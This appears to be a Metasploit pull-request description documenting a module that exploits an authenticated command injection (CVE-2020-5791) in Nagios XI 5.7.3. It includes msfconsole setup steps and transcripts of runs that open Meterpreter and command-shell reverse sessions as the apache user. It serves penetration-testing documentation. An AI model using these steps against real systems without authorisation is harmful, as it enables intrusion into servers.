This change adds a module to `modules/exploit/linux/http/` that exploits an OS command injection vulnerability (CVE-2020-5791) in Naxios XI version 5.7.3 (and possibly older versions) to achieve remote code execution as the `apache` user. The `check` method takes advantage of the Nagios XI mixin introduced in PR #14697. This PR also adds documentation.

## Vulnerable Application
Nagios XI version 5.7.3 (and possibly older versions)

## Verification Steps
1. Start msfconsole
2. Do: `use exploit/linux/http/nagios_xi_mibs_authenticated_rce`
3. Do: `set RHOSTS [IP]`
4. Do: `set USERNAME [username for the Nagios XI account]`
5. Do: `set PASSWORD [password for the Nagios XI account]`
6. Do: `set target [target]`
7. Do: `set payload [payload]`
8. Do: `set LHOST [IP]`
9. Do: `exploit`

## Options
### PASSWORD
The password for the Nagios XI account to authenticate with.
### TARGETURI
The base path to Nagios XI. The default value is `/nagiosxi/`.
### USERNAME
The username for the Nagios XI account to authenticate with. The default value is `nagiosadmin`.

## Targets
```
Id  Name
--  ----
0   Linux
1   CMD
```

## Scenarios
### Nagios XI 5.7.3 running on CentOS 7 - Linux target
```
msf6 exploit(linux/http/nagios_xi_mibs_authenticated_rce) > show options 

Module options (exploit/linux/http/nagios_xi_mibs_authenticated_rce):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD   nagiosadmin      yes       Password to authenticate with
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     192.168.1.14     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      80               yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT    8080             yes       The local port to listen on.
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /nagiosxi/       yes       The base path to the NagiosXi application
   URIPATH                     no        The URI to use for this exploit (default is random)
   USERNAME   nagiosadmin      yes       Username to authenticate with
   VHOST                       no        HTTP server virtual host


Payload options (linux/x86/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.1.12     yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Linux


msf6 exploit(linux/http/nagios_xi_mibs_authenticated_rce) > run

[*] Started reverse TCP handler on 192.168.1.12:4444 
[*] Executing automatic check (disable AutoCheck to override)
[+] Successfully authenticated to Nagios XI
[*] Target is Nagios XI with version 5.7.3
[+] The target appears to be vulnerable.
[*] Sending stage (976712 bytes) to 192.168.1.14
[*] Command Stager progress - 100.00% done (773/773 bytes)
[*] Meterpreter session 1 opened (192.168.1.12:4444 -> 192.168.1.14:41960) at 2021-02-01 09:43:38 -0500

meterpreter > getuid
Server username: apache @ localhost.localdomain (uid=48, gid=48, euid=48, egid=48)
```
### Nagios XI 5.7.3 running on CentOS 7 - CMD target
```
msf6 exploit(linux/http/nagios_xi_mibs_authenticated_rce) > run

[*] Started reverse SSL handler on 192.168.1.12:4444 
[*] Executing automatic check (disable AutoCheck to override)
[+] Successfully authenticated to Nagios XI
[*] Target is Nagios XI with version 5.7.3
[+] The target appears to be vulnerable.
[*] Executing the payload
[*] Command shell session 2 opened (192.168.1.12:4444 -> 192.168.1.14:41962) at 2021-02-01 09:43:45 -0500

id
uid=48(apache) gid=48(apache) groups=48(apache),1000(nagios),1001(nagcmd)
```

